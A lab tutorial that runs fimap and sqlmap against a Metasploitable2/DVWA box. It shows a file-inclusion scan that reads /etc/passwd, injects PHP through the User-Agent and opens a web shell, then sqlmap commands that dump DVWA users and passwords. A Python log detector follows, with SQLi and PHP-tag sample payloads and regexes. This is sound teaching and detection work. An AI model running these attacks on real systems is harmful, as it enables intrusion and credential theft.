Testing file inclusion vulnerabilities with Fimap and Metasploitable2


fimap

First, look at the vulnerability that already exists on msf:

root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'
[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...
[05:57:09] [INFO] Fiddling around with URL...
[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.
[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...
[05:57:09] [INFO] Scriptpath received: '/var/www'
[05:57:09] [INFO] Operating System is 'Unix-Like'.
[05:57:09] [INFO] Testing file '/etc/passwd'...
[05:57:09] [INFO] Testing file '/proc/self/environ'...
[05:57:09] [INFO] Testing file 'php://input'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...
[05:57:09] [INFO] Testing file '/apache/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache/logs/access_log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...
[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/log/access_log'...
[05:57:10] [INFO] Testing file '/var/log/access.log'...
[05:57:10] [INFO] Testing file '/logs/access.log'...
[05:57:10] [INFO] Testing file '/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/log/auth.log'...
[05:57:10] [INFO] Testing file '/var/log/secure'...
[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################
#[1] Possible PHP-File Inclusion #
##################################################################
#::REQUEST #
# [URL] http://192.168.136.130/lfi.php?page=index.php #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] page #
# [PATH] /var/www #
# [OS] Unix #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] /proc/self/environ #
# [2] /var/log/auth.log #
##################################################################
root@kali:~# clear
root@kali:~# fimap -x --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
###########################
#:: List of Domains :: #
###########################
#[1] 192.168.136.130 #
#[q] Quit #
###########################
Choose Domain: 1
#####################################################################################################
#:: FI Bugs on '192.168.136.130' :: #
#####################################################################################################
#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page' #
#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page' #
#[q] Quit #
#####################################################################################################
Choose vulnerable script: 1
[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...
[06:01:09] [OUT] PHP Injection works! Testing if execution works...
[06:01:09] [INFO] Testing execution thru 'popen[b64]'...
[06:01:09] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks - PHP and SHELL access :: #
####################################################
#[1] Spawn fimap shell #
#[2] Spawn pentestmonkey's reverse shell #
#[3] [Test Plugin] Show some info #
#[q] Quit #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www$>

Using sqlmap and Metasploitable2 for an SQL injection experiment


The experimental environment is sqlmap on Kali and Metasploitable2. The DVWA session cookie and the security=low cookie are passed with --cookie so that sqlmap tests the logged-in, low-security page.

Confirm that the id parameter is injectable:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low'

Retrieve the database user the application connects as:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --current-user

Retrieve the database currently in use:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --current-db

List all databases:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --dbs

List the database users:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --users

List the tables in the dvwa database:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --tables -D dvwa

List the columns of the users table:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --columns -T users -D dvwa

Dump the user and password columns of the users table:
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSESSID=31e286bfcb5f99785b26e2af656da170;security=low' --dump -C user,password -T users -D dvwa
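Both scans leave a clear trace in the target's Apache access log. The following Python script is an added example, not part of the original post: it parses combined-format log lines and flags query values that carry the files fimap probed above or the quote-and-boolean payloads sqlmap starts with, plus User-Agents that carry PHP tags (the /proc/self/environ injection seen in the fimap session) or a tool banner. The sample log lines, IPs and timestamps are constructed, not real captures.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: ip ident user [ts] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files fimap tried through the vulnerable parameter (see the scan output above) and php:// wrappers.
LFI_RE = re.compile(r"\.\./|/etc/passwd|/proc/self/environ|/var/log/|access[_.]log|php://", re.I)
# A closing quote followed by a boolean operator, UNION SELECT, or a timing function.
SQLI_RE = re.compile(r"'\s*(and|or|union)\b|\bunion\s+(all\s+)?select\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I)
# PHP tags in a User-Agent mean someone is seeding /proc/self/environ or a log file for inclusion.
UA_RE = re.compile(r"<\?(php|=)|\bsqlmap\b|\bfimap\b", re.I)


def classify(line):
    """Parse one log line; return a dict with its findings, or None if the line is not parsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qsl decodes %xx and '+' so the patterns see the same bytes PHP saw.
    for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
        if LFI_RE.search(value):
            findings.append(("lfi", name))
        if SQLI_RE.search(value):
            findings.append(("sqli", name))
    if UA_RE.search(m["ua"]):
        findings.append(("ua", m["ua"]))
    return {"ip": m["ip"], "path": m["path"], "findings": findings}


def scan(lines):
    """Return only the parsed lines that carry at least one finding."""
    return [c for c in map(classify, lines) if c and c["findings"]]


# Constructed sample lines in the shape the Metasploitable2 Apache would write (hypothetical data).
SAMPLE_LOG = [
    '192.168.136.128 - - [10/Oct/2016:05:57:09 +0000] "GET /lfi.php?page=/proc/self/environ HTTP/1.1" 200 1542 "-" "<?php echo 1; ?>"',
    '192.168.136.128 - - [10/Oct/2016:06:10:41 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1--%20&Submit=Submit HTTP/1.1" 200 4190 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.168.136.1 - - [10/Oct/2016:06:12:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4190 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["findings"])
```

Feed it the real access.log with `scan(open(path))` and the third, benign-looking line shows why the User-Agent check matters: a log-poisoning request is invisible if you only look at the URL.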
